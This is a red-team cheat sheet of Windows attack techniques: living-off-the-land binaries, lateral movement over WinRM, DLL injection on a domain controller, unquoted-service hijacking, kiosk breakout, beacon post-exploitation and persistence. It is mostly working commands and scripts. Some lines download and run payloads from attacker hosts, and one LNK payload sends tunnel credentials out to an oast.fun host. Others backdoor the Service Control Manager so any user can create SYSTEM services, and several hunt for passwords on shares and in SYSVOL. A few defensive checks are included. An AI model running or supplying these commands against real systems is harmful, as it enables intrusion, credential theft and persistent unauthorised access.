rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";
# Could execute javascript from a RunKey in the reg
Cscript and Wscript - Execute
cscript malicious.vbs

wscript malicious.vbs
SchTask - Download and Run Local
# Local (/ru SYSTEM needs an elevated shell; the name in /run must match /create)
schtasks /create /tn "MaliciousTask" /tr "bitsadmin.exe /transfer myjob /download /priority normal http://malicious.com/malware.exe %AppData%\malware.exe" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "MaliciousTask"
SchTask - Create Task on Remote Computer
schtasks /create /s RemoteComputerName /tn "RemoteTask" /tr "C:\Path\To\Script.bat" /sc daily /st 08:00
netsh - Open Firewall and Execute Script File (netsh exec runs the netsh commands listed in a script file)
netsh.exe advfirewall firewall add rule name="Malicious Rule" dir=in action=allow program="C:\Windows\System32\netsh.exe" enable=yes
netsh.exe exec malware.txt
Atbroker.exe
ATBroker.exe /start $name
cmdkey.exe
cmdkey.exe /list
Esentutl.exe
esentutl.exe /y helloworld.exe /d $env:temp\$name /o

winword.exe - load dll

winword.exe /l dllfile.dll
powershell - Download & Execute a DLL as a CPL file w/ docx decoy
powershell -WindowStyle Hidden -c "Invoke-WebRequest -Uri 'http://192.168.0.122:8000/invoice.docx' -OutFile $env:USERPROFILE\Downloads\invoice.docx; Invoke-Item $env:USERPROFILE\Downloads\invoice.docx; Invoke-WebRequest -Uri 'http://192.168.0.122:8000/invoice.cpl' -OutFile $env:USERPROFILE\Documents\invoice.cpl; Start-Process control.exe -ArgumentList $env:USERPROFILE\Documents\invoice.cpl"
CONHOST - Indirect Execution
conhost ipconfig > ipconfig.txt
conhost whoami > whoami.txt
wt.exe - Indirect Execution
wt.exe calc.exe
CustomShellHost.exe - (Kiosk mode app)

CustomShellHost.exe launches explorer.exe from its own directory. Copy CustomShellHost.exe into a directory you can write to, rename your payload to explorer.exe in that same directory, then run CustomShellHost.exe.

DNSAdmin / DNSCMD.exe - Remotely inject a DLL on a DC by registering it as a plugin for the DNS service (needs DNSAdmins or equivalent; the DLL is loaded as SYSTEM when the DNS service restarts)
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
sc.exe \\dc1.lab.int stop dns
sc.exe \\dc1.lab.int start dns
TTDInject.exe - Admin required and logged

tttracer.exe writes a .run trace file and, under the hood, uses TTDInject.exe to load the recorder into the target process.

TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"

ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"



Living Off the Land Scripts

CL_LoadAssembly.ps1 - lolscript - Proxy Execution with a signed PS script
powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Main()"
CL_MutexVerifiers.ps1 - lolscript - Import and execute by calling runAfterCancelProcess runme.ps1
Ref: https://twitter.com/pabraeken/status/995111125447577600
Paths:
  C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
  C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
  C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
  C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
  C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1
. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1
runAfterCancelProcess calc.ps1
winrm.vbs - Lateral Movement / Proxied Command Execution
winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985

winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985

Cscript/WinRM.vbs - Lateral Movement Command and Service
cscript.exe //nologo %windir%\System32\winrm.vbs invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://192.168.0.122:5985

cscript.exe //nologo %windir%\System32\winrm.vbs invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
CScript/Winrm.vbs - AWL Bypass
Bypass AWL solutions by copying cscript.exe to an attacker-controlled location, creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe
copy %windir%\System32\cscript.exe %SystemDrive%\BypassDir\cscript.exe
copy evil.xsl %SystemDrive%\BypassDir\WsmPty.xsl

%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty



Privilege Escalation Techniques

PrivEscCheck - Load In Memory and Run Extended Checks
# Extended Checks to the Console
powershell -ep bypass -c "Invoke-Expression (iwr -UseBasicParsing https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1).Content; Invoke-PrivescCheck -Extended"

# All In One with Output Files
powershell -ep bypass -c "Invoke-Expression (iwr -UseBasicParsing https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1).Content; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,CSV,HTML,XML"
Services - wmic - Look for unquoted service paths
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
Services - powershell - Look for unquoted service paths
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName
Services - Permissions
The permissions we are looking for on any directory along an unquoted path are any one of the following three:

(F) Full Control
(M) Modify
(W) Write

granted to one of the following principals:

the user we are currently logged in as (%USERNAME%)
Authenticated Users
Everyone
BUILTIN\Users
NT AUTHORITY\INTERACTIVE

For C:\Program Files\App Name\svc.exe Windows tries C:\Program.exe and then C:\Program Files\App.exe before the real binary, so if C:\ or C:\Program Files grants us M, F or W we can drop a binary that the service runs at start.
icacls.exe - cmd - Check Permissions
icacls C:\
icacls "C:\Program Files"
icacls "C:\Program Files\Jankins"
get-acl - powershell - check folder permissions
Get-Acl -Path C:\ | Format-List
Get-Acl -Path "C:\Program Files" | Format-List
Get-Acl -Path "C:\Program Files\Jankins" | Format-List
accesschk.exe - Sysinternals - list directories writable by the given user (-w write, -u suppress errors, -d directories only, -v verbose)
.\accesschk64.exe -wvud "C:\" -accepteula
.\accesschk64.exe -wvud "C:\Program Files" -accepteula
.\accesschk64.exe -wvud "C:\Program Files\Jankins" -accepteula
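The three checks above (unquoted paths, which directories Windows will search first, and who can write there) combined into one PowerShell function. This is an added example, not code from the original page. It assumes it runs on the target host as the low-privileged user you are evaluating; the write test looks at Allow ACEs for the current token's user and groups only (a Deny ACE would override a hit, so confirm by actually dropping a file before relying on it).

```powershell
function Get-HijackCandidate {
    # For an unquoted image path, return the "C:\Program.exe"-style paths Windows tries before the real binary
    param([Parameter(Mandatory)][string]$UnquotedPath)
    # Image path is everything up to and including the first ".exe"; the rest is arguments
    $exe = [regex]::Match($UnquotedPath, '(?i)^.*?\.exe').Value
    if (-not $exe) { return }
    $idx = $exe.IndexOf(' ')
    while ($idx -ge 0) {
        $exe.Substring(0, $idx) + '.exe'
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
}

function Get-WritableByMe {
    # Allow ACEs on $Directory that grant the current token a directory write right
    param([Parameter(Mandatory)][string]$Directory)
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mine = @($id.Name) + @($id.Groups | ForEach-Object {
        try { $_.Translate([System.Security.Principal.NTAccount]).Value } catch { $null }
    })
    $mine = @($mine | Where-Object { $_ })
    # CreateFiles/WriteData (0x2), GENERIC_WRITE (0x40000000), GENERIC_ALL (0x10000000); Modify and Full include 0x2
    $writeMask = 0x2 -bor 0x40000000 -bor 0x10000000
    try { $acl = Get-Acl -Path $Directory -ErrorAction Stop } catch { return $null }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $mine -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $writeMask) -ne 0
    }
}

function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
      Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '(?i)^[a-z]:\\windows\\' } |
      ForEach-Object {
        $svc = $_
        foreach ($cand in (Get-HijackCandidate $svc.PathName)) {
            $dir   = Split-Path -Path $cand -Parent
            $rules = Get-WritableByMe -Directory $dir
            if ($rules) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    StartMode = $svc.StartMode
                    RunsAs    = $svc.StartName
                    PathName  = $svc.PathName
                    DropFile  = $cand                      # write your binary exactly here
                    GrantedBy = (@($rules) | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
                }
            }
        }
      }
}

Find-UnquotedServicePath | Format-List
```

A hit is only useful if you can also restart the service (sc start, or StartMode Auto plus a reboot) and it runs as something better than you (RunsAs LocalSystem is the common case); the output carries both so you can triage without a second query.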
Windows Exploit Suggester - NG
git clone https://github.com/bitsadmin/wesng.git --depth 1

systeminfo.exe > systeminfo.txt

# Update
wes.py --update

# Only criticals, color
wes.py systeminfo.txt -c -s critical

# Only vulns w/ exploits, color
wes.py systeminfo.txt -e -c
Sessions - List RDP/console sessions (qwinsta) and Kerberos logon sessions (klist sessions)
qwinsta
klist sessions



Useful Tricks and Combo-breakers

RPCPing.exe - Force NTLM authentication to a server you control (rpcserver.py, Responder or ntlmrelayx can capture the Net-NTLM response)
# RPC test connection to the target server (-s) over named pipes (SMB), authenticating with the current user's NTLM credentials
rpcping -s 127.0.0.1 -t ncacn_np

rpcping -s 192.168.1.10 -t ncacn_np

# Explicit endpoint (-e) and auth level, with NTLM forced as the authentication service (-u NTLM)
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
AcroRdr32 - Replace a component EXE for proxy execution when Acrobat starts

Acrobat Reader launches RdrCEF.exe on start; replacing it with a payload executable (needs write access to the Reader install directory, so normally admin) runs the payload every time the user opens Reader

cp malware.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"
FileHistory.exe - AppDomainManager injection: write a FileHistory.exe.config that points to your managed DLL (here uevmonitor.dll), put FileHistory.exe next to it and run it
Needs a user-writable directory; you can bring your own copy of FileHistory.exe rather than copy it out of System32
cd "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF"
notepad filehistory.exe.config

curl.exe -o uevmonitor.dll https://attacker.azurewebsites.net/assets/uevmonitor
# curl.exe -o FileHistory.exe https://attacker.azurewebsites.net/assets/filehistory

cp C:\windows\system32\filehistory.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\FileHistory.exe"

.\FileHistory.exe 
PSR.exe - Start invisible screen capture without a GUI on target (Problem Steps Recorder; /sc 1 captures screenshots, /gui 0 hides the recorder window)
C:\Windows\System32\psr.exe /start /output C:\test.zip /sc 1 /gui 0

# Stop
C:\Windows\System32\psr.exe /stop
sc.exe / sdset - ESCALATE / PERSISTENT BACKDOOR

SDDL ACE format: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid). Reading D:(A;;KA;;;WD): D: = the DACL, A = access allowed, no ACE flags, KA = KEY_ALL_ACCESS (full control), no object GUIDs, WD = Everyone. Other common SID abbreviations: AU = Authenticated Users, BA = Built-in Administrators, SY = SYSTEM, IU = Interactive Users. Setting this descriptor on scmanager from an elevated shell replaces the Service Control Manager's DACL so that every user can create and start services, and services run as SYSTEM unless told otherwise; it survives reboots until someone resets it. Record the original with sc.exe sdshow scmanager first so you can restore it.

sc.exe - sdset to grant every user full control of the Service Control Manager
sc.exe sdshow scmanager
sc.exe sdset scmanager D:(A;;KA;;;WD)


# Switch User
Switch to the 'lowpriv' backdoor user

# Create a service as "lowpriv" that adds the user to Administrators when it starts (sc.exe needs the space after each "option=")
sc create DirectXDiagnostics displayName= "DirectXDiagnostics" binPath= "C:\Windows\System32\net.exe localgroup Administrators lowpriv /add" start= auto

# Start it (if you are denied SERVICE_START on the new service it still runs at the next boot because of start= auto)
sc start DirectXDiagnostics

# Check status (the service reports a failure because net.exe is not a real service binary, but the command has already run)
sc query DirectXDiagnostics
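The reverse of the sdset trick above: a PowerShell check that parses the SDDL string sc.exe sdshow scmanager prints and flags any DACL entry giving a low-privilege principal rights that let it create or take over services. This is an added example, not code from the original page. The two SDDL strings at the bottom are constructed samples (one resembling a stock SCM descriptor, one after the sdset above); on a live host feed it the real output as shown in the last comment.

```powershell
function Get-SddlDaclAce {
    # Split the DACL part of an SDDL string into (type, rights, sid) records
    param([Parameter(Mandatory)][string]$Sddl)
    # The DACL is the text between "D:" and "S:" (the SACL), or the end of the string
    $dacl = [regex]::Match($Sddl, 'D:(?<d>.*?)(S:|$)').Groups['d'].Value
    foreach ($m in [regex]::Matches($dacl, '\((?<type>[^;]*);(?<flags>[^;]*);(?<rights>[^;]*);(?<og>[^;]*);(?<ig>[^;]*);(?<sid>[^)]*)\)')) {
        [pscustomobject]@{
            Type   = $m.Groups['type'].Value    # A = access allowed, D = denied, AU = audit (SACL only)
            Rights = $m.Groups['rights'].Value  # two-letter tokens such as CC, KA, GA, or a 0x... mask
            Sid    = $m.Groups['sid'].Value     # WD = Everyone, AU = Authenticated Users, BA = Admins, SY = SYSTEM
        }
    }
}

function Test-ScmDescriptor {
    # Report Allow ACEs on the Service Control Manager that hand low-privilege principals control rights
    param([Parameter(Mandatory)][string]$Sddl)
    $lowPriv   = 'WD','AU','BU','IU','AC','AN'     # Everyone, Authenticated Users, Users, Interactive, App packages, Anonymous
    # KA/GA = full control, GW = generic write, WD/WO = write DAC/owner, DC = SC_MANAGER_CREATE_SERVICE on scmanager
    $dangerous = 'KA','GA','GW','WD','WO','DC'
    # Same rights as a bit mask, for ACEs written as hex: 0x2 create service, 0x40000 write DAC,
    # 0x80000 write owner, 0x10000000 GENERIC_ALL, 0x40000000 GENERIC_WRITE
    $bitMask   = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
    foreach ($ace in Get-SddlDaclAce -Sddl $Sddl) {
        if ($ace.Type -ne 'A' -or $lowPriv -notcontains $ace.Sid) { continue }
        $hit = $false
        if ($ace.Rights -like '0x*') {
            $hit = (([int64]$ace.Rights) -band $bitMask) -ne 0
        } else {
            $tokens = [regex]::Matches($ace.Rights, '..') | ForEach-Object { $_.Value }
            $hit = @($tokens | Where-Object { $dangerous -contains $_ }).Count -gt 0
        }
        if ($hit) { [pscustomobject]@{ Sid = $ace.Sid; Rights = $ace.Rights } }
    }
}

# Constructed samples: a descriptor resembling a stock Windows 10 SCM DACL, and the one sdset above leaves behind
$stockScm   = 'D:(A;;CC;;;AU)(A;;CCLCRPRC;;;IU)(A;;CCLCRPRC;;;SU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)(A;;CC;;;AC)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)'
$backdoored = 'D:(A;;KA;;;WD)'

'stock (expect nothing):';   Test-ScmDescriptor -Sddl $stockScm
'backdoored (expect a hit):'; Test-ScmDescriptor -Sddl $backdoored

# Live: Test-ScmDescriptor -Sddl ((sc.exe sdshow scmanager) -join '')
```

On the defensive side the same change shows up as a service creation by a non-admin account (event 7045 in the System log, 4697 in Security when service auditing is on) following a scmanager descriptor that no longer matches the baseline; comparing sc.exe sdshow scmanager output against a known-good copy is cheap enough to run from any endpoint agent.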
BGInfo.exe - Sysinternals - Create new custom field to run VBSScript or WMI queries, etc
.\bginfo.exe

C:\ProgramData\chocolatey\lib\sysinternals\tools\Bginfo.exe
Code.exe - Dev Tunnel - Reverse Powershell Session over MS Infra
 & "C:\Program Files\Microsoft VS Code\Code.exe" tunnel --accept-server-license-terms --name "tunnel-name"

# Download portable VS Cli
iwr "https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64" -OutFile code.zip
expand-archive .\code.zip

# Redirect stdout to file
Start-Process -FilePath .\code.exe  -ArgumentList "tunnel --name FudgeTunnel" -RedirectStandardOutput  .\output.txt

# Logout of tunnel
.\code.exe tunnel user logout
Code.exe - Dev tunnel - Full Chain w/ LNK prep
Could try the C:\Windows\Temp directory and specify --cli-data-dir for an AWL bypass
#Payload
$EXEPath = "$env:windir\System32\WindowsPowerShell\v1.0\powershell.exe"
$pay = 'mkdir c:\Temp -Force | Out-Null; cd C:\temp; iwr -uri https://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip -OutFile vscode.zip; Expand-Archive vscode.zip; cd vscode; .\code.exe tunnel user logout; Start-Sleep 3; Start-Process -FilePath .\code.exe -ArgumentList "tunnel","--name","fudgetunnel" -RedirectStandardOutput .\output.txt; Start-Sleep 3; iwr -uri cf9dk1w2vtc0000vhr10g8ws3ohyyyyyb.oast.fun -Method Post -Body (Get-Content .\output.txt)'
$arguments = " -nop -c $pay"

#lnk file
$LNKName = 123
$obj = New-Object -ComObject WScript.Shell
$link = $obj.CreateShortcut((Get-Location).Path + "\" + $LNKName + ".lnk")
$link.WindowStyle = '7'
$link.TargetPath = $EXEPath
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13"
$link.Arguments = $arguments
$link.Save()
Teams / Update.exe - Download and AWL Bypass via NuGet Packages in RELEASE file
# download
%localappdata%\Microsoft\Teams\update.exe --download https://github.com/attacker/RELEASE

# update web, share and rollback from share
%localappdata%\Microsoft\Teams\update.exe --update https://github.com/attacker/RELEASE
%localappdata%\Microsoft\Teams\update.exe --update=\\remoteserver\payloadFolder
%localappdata%\Microsoft\Teams\update.exe --updateRollback=\\remoteserver\payloadFolder

# Exec - Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command
Update.exe --processStart payload.exe --process-start-args "whatever args"
Teams / Update.exe - Persistence
Copy your payload into "%localappdata%\Microsoft\Teams\current". Then run the command below: Update.exe creates a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup", so the payload runs at every login of the user who ran it.
%localappdata%\Microsoft\Teams\update.exe --createShortcut=payload.exe -l=Startup

%localappdata%\Microsoft\Teams\update.exe --removeShortcut=payload.exe -l=Startup
Expand/InstallUtil - Place installer/payload dlls in CAB on SMB share, Expand and Background Execute Payload DLL with Installer dll using Uninstall option, no logging
expand \\192.168.0.122\corporate\newpdf.cab -F:* . && set URL="http://attacker.azurewebsites.net:8080" && set DLL=".\newpdf.dll" && start /B cmd /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe /logfile= /u /dll=%DLL% /url=%URL% .\installer.dll >nul 2>&1" 

# Mark them hidden until you're done
attrib +h newpdf.dll && attrib +h installer.dll

# kill installutil to delete the files
taskkill /IM installutil.exe /F

Kiosks, Application Escape and Breakout

Getting a shell
  • Shortcuts: [Windows] + [R] -> cmd; [CTRL] + [SHIFT] + [ESC] -> Task Manager; [CTRL] + [ALT] + [DELETE] -> Task Manager

  • Access through file browser: Browsing to the folder containing the binary (i.e. C:\windows\system32), we can simply right click and open it

  • Drag-and-drop: dragging and dropping any file onto the cmd.exe

  • Hyperlink: file:///c:/Windows/System32/cmd.exe

  • Task Manager: File > New Task (Run…) > cmd

  • MSPAINT.exe: open mspaint.exe and set the canvas size to Width=6 and Height=1 pixels. Zoom in to make the next steps easier. Using the colour picker, set the pixel values to (from left to right):

    1st: R: 10, G: 0, B: 0
    2nd: R: 13, G: 10, B: 13
    3rd: R: 100, G: 109, B: 99
    4th: R: 120, G: 101, B: 46
    5th: R: 0, G: 0, B: 101
    6th: R: 0, G: 0, B: 0

    Save it as 24-bit Bitmap (.bmp;.dib), change the extension from .bmp to .bat and run it. Pixels are stored as B,G,R bytes, so the row decodes to "cmd.exe".

  • Sticky Keys: spawn the Sticky Keys dialog
    • Hit [SHIFT] 5 times
    • Visit "Ease of Access Center"
    • You land on "Set up Sticky Keys"; move up a level to "Ease of Access Center"
    • Start the OSK (On-Screen Keyboard); you can now use keyboard shortcuts (CTRL+N)

  • Via Shell URI: shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

  • Dialog Boxes

    • Creating new files

      • Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
      • Shortcuts – Right click > New > Shortcut > %WINDIR%\system32
    • Open a new Windows Explorer instance

      • Right click any folder > select Open in new window
    • Exploring Context Menus

      • Right click any file/folder and explore context menus
      • Clicking Properties, especially on shortcuts, can yield further access via Open File Location
    • Save as

      • “Save as” / “Open as” option
      • “Print” feature – selecting “print to file” option (XPS/PDF/etc)
      • \\127.0.0.1\c$\Windows\System32\ and execute cmd.exe
    • Input Boxes

      • Many input boxes accept file paths; try all inputs with UNC paths such as //attacker-pc/ or //127.0.0.1/c$ or C:\
    • Bypass file restrictions

      • Enter . or *.exe or similar in File name box
    • Internet Explorer

      • Download and Run/Open
      • Text files -> opened by Notepad
    • Menus

      • The address bar
      • Search menus
      • Help menus
      • Print menus
      • All other menus that provide dialog boxes
    • Accessing filesystem

      • Enter these paths in the address bar:
      • file://C:/windows
      • C:/windows/
      • %HOMEDRIVE%
      • \\127.0.0.1\c$\Windows\System32
    • Unassociated Protocols

      • It is possible to escape a browser based kiosk with other protocols than usual http or https. If you have access to the address bar, you can use any known protocol (irc, ftp, telnet, mailto, etc.) to trigger the open with prompt and select a program installed on the host. The program will then be launched with the uri as a parameter, you need to select a program that will not crash when receiving it. It is possible to send multiple parameters to the program by adding spaces in your uri.

      • Note: This technique requires that the protocol used is not already associated with a program.

      • Example - Launching Firefox with a custom profile:

        • This is a nice trick since Firefox launched with the custom profile may not be as much hardened as the default profile.
        • Firefox needs to be installed.
        • Enter the following URI in the address bar: irc://127.0.0.1 -P "Test"
        • Press enter to navigate to the URI.
        • Select the Firefox program.
        • Firefox will be launched with the profile Test.
        • In this example, it’s the equivalent of running the following command: firefox irc://127.0.0.1 -P "Test"
    • Shell URI Handlers

      • shell:DocumentsLibrary
      • shell:Libraries
      • shell:UserProfiles
      • shell:Personal
      • shell:SearchHomeFolder
      • shell:System
      • shell:NetworkPlacesFolder
      • shell:SendTo
      • shell:Common Administrative Tools
      • shell:MyComputerFolder
      • shell:InternetFolder
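
Added example, not part of the original notes: PowerShell that builds the 6x1, 24-bit bitmap from the MSPaint trick above and reads the pixel row back as R/G/B triples, so the colour values stop being magic numbers. Everything is derived from the BMP file format and the values listed in the recipe; the output path and the 'cmd.exe' default are the only assumptions.

```powershell
# Added example: reproduce the MSPaint bitmap-to-batch trick programmatically.
# BMP stores each 24-bit pixel as B,G,R and pads rows to a 4-byte boundary, so a
# 6-pixel row is 18 bytes + 2 padding bytes whose content is "\0\0\n\r\n\rcmd.exe" + NULs.
function New-CmdBitmap {
    param(
        [string]$Path    = (Join-Path $env:TEMP 'canvas.bmp'),   # assumption: any writable location
        [string]$Command = 'cmd.exe',
        [int]$Width      = 6                                     # the recipe's canvas width
    )
    # Pixel row: two NULs, then LF/CR separators so the binary header ends on its own line, then the command.
    $row = [byte[]]([byte[]](0, 0) + [System.Text.Encoding]::ASCII.GetBytes("`n`r`n`r$Command"))
    if ($row.Length -gt $Width * 3) { throw "Command needs at least $([math]::Ceiling($row.Length / 3)) pixels" }
    $stride = [int]([math]::Ceiling($Width * 3 / 4) * 4)        # BMP rows are padded to 4-byte multiples
    $pixels = New-Object byte[] $stride
    [Array]::Copy($row, $pixels, $row.Length)

    $ms = New-Object System.IO.MemoryStream
    $w  = New-Object System.IO.BinaryWriter($ms)
    $w.Write([byte[]](0x42, 0x4D))                 # BITMAPFILEHEADER: 'BM'
    $w.Write([uint32](54 + $stride))               # file size: 14 + 40 header bytes + one row
    $w.Write([uint32]0)                            # reserved
    $w.Write([uint32]54)                           # offset of pixel data
    $w.Write([uint32]40)                           # BITMAPINFOHEADER size
    $w.Write([int32]$Width); $w.Write([int32]1)    # width, height (one row)
    $w.Write([uint16]1); $w.Write([uint16]24)      # colour planes, bits per pixel
    $w.Write([uint32]0); $w.Write([uint32]$stride) # BI_RGB (uncompressed), image size
    $w.Write([int32]2835); $w.Write([int32]2835)   # 72 DPI expressed in pixels per metre
    $w.Write([uint32]0); $w.Write([uint32]0)       # no palette
    $w.Write($pixels)
    $w.Flush()
    [System.IO.File]::WriteAllBytes($Path, $ms.ToArray())
    return $Path
}

# Read the pixel row back as R/G/B triples, the way MSPaint's colour picker shows them.
function Get-BitmapPixelRgb {
    param([Parameter(Mandatory)][string]$Path)
    $bytes  = [System.IO.File]::ReadAllBytes($Path)
    $offset = [int][BitConverter]::ToUInt32($bytes, 10)   # pixel data offset from the file header
    $width  = [BitConverter]::ToInt32($bytes, 18)         # width from BITMAPINFOHEADER
    foreach ($i in 0..($width - 1)) {
        $p = $offset + $i * 3
        'R: {0}, G: {1}, B: {2}' -f $bytes[$p + 2], $bytes[$p + 1], $bytes[$p]
    }
}

$bmp = New-CmdBitmap
Get-BitmapPixelRgb -Path $bmp
# Rename step from the trick: Copy-Item $bmp ([System.IO.Path]::ChangeExtension($bmp, '.bat'))
```

The six triples printed match the recipe above exactly (10/0/0, 13/10/13, 100/109/99, 120/101/46, 0/0/101, 0/0/0). When the renamed file is run, cmd reports the binary header line as an unrecognised command and then executes the cmd.exe line that follows it; any other command that fits in the row works the same way, with -Width raised as needed.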

Post-Exploitation - Sadrat Beacon

Cmdkey, Check WDigest and Cached Cred count
shell cmdkey /list
shell reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Search for Passwords locally and in Sysvol
# Each `shell` call is a fresh cmd.exe: set and cd do not carry over to the next call, and %VAR% on the same line is expanded before set runs. Chain with && or use variables the logon session already has (%USERDNSDOMAIN%).
shell cd /d C:\ && findstr /snip password *.xml *.ini *.txt *.xls *.xlsx *.docx *.pdf
shell cd /d C:\ && findstr /snip password *
shell cd /d C:\ && dir /s *password* == *cred* == *.config* == *key*
shell findstr /S /I cpassword \\%USERDNSDOMAIN%\sysvol\%USERDNSDOMAIN%\policies\*.xml
Prepare Script - Find open shares, make a list of them (found_shares.txt, one UNC path per line) and search each one for passwords
@echo off
for /F "tokens=*" %%a in (found_shares.txt) do (
 C:
 net use Z: /delete /y
 net use Z: "%%a"
 Z:
 echo %%a
 echo %%a >> "C:\Temp\output_file.txt"
 if exist Z:\ ( findstr /snip password * >> "C:\Temp\output_file.txt" )
)

download sharing.bat
shell sharing.bat 
Establish devtunnel
# download Code.exe from Teamserver
download Code.exe
shell Code.exe tunnel --accept-server-license-terms --name "tunnel-name"

# Logout of tunnel
shell Code.exe tunnel user logout
Download and Execute supersharpshares as settingsynchost - Blocked by MDE now Q1/2024
download sssh.exe
shell move sssh.exe settingsynchost.exe
shell move settingsynchost.exe %TEMP%
shell "C:\Windows\System32\SettingSyncHost.exe -LoadAndRunDiagScriptNoCab DoesntMatter"
nltest - cosplay a ransomware operator
# get user info (%USERNAME% expands directly; set X=... && ...%X% does not work on one cmd line)
shell nltest /user:%USERNAME%

# get DCs
shell nltest /dclist:%USERDNSDOMAIN%
dsquery.exe - Yololbin - cli LDAP query tool

dsquery https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb

# package dsquery.exe and dsquery.dll into .cab
download ds.cab
shell expand ds.cab -F:* .
shell dsquery.exe

# find all users, groups, OUs, Computers, Servers
shell dsquery user
shell dsquery group
shell dsquery ou
shell dsquery computer
shell dsquery server

# name and SAM of all windows machines (192.168.2.1 is the DC; -s targets a specific server, -d expects a domain name)
shell dsquery * -filter "(&(objectclass=computer)(name=*win*))" -attr name samaccountname -s 192.168.2.1

# admin groups
shell dsquery group -name *admin* -s 192.168.2.1
shell dsquery * -filter "(&(objectclass=group)(name=*admin*))" -attr name samaccountname -s 192.168.2.1
shell dsquery * -filter "(&(objectclass=group)(samaccountname=Domain Admins))" -attr name samaccountname member -s 192.168.2.1
PortQuery
download portqry.exe
shell portqry -n %IP% -e 3389
LDP.exe - LDAP GUI query and edit tool bring it over from the server
mv ldp.exe pdl.exe
...
download pdl.exe
shell pdl.exe
ADExplorer Snapshot - Requires GUI Access

Snapshot parser:

# Download to teamserver
# curl https://download.sysinternals.com/files/AdExplorer.zip -o adexplorer.zip && unzip adexplorer.zip

cp ~/laughriot/yololbins/AdExplorer64.exe adexplorer.exe
mv adexplorer.exe skype4all.exe
...

# download through the implant, open GUI, take snapshot
download skype4all.exe
shell skype4all.exe
upload snapshot.dat
...

# parse it as Bloodhound output
python ADExplorerSnapshot.py -m Bloodhound snapshot.dat
ShareEnum - Sysinternals GUI Sharefinder
# download to Teamserver
curl https://download.sysinternals.com/files/ShareEnum.zip -o shares.zip && unzip shares.zip
mv ShareEnum.exe sen.exe 
...
download sen.exe
shell sen.exe
QEMU - Setup a VM Beachhead
cp ~/laughriot/yololbins/qemu.cab .
download qemu.cab
shell

Persistence

SVCHost - TinyTurla Style Persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v sysman /t REG_MULTI_SZ /d "sdm" /f
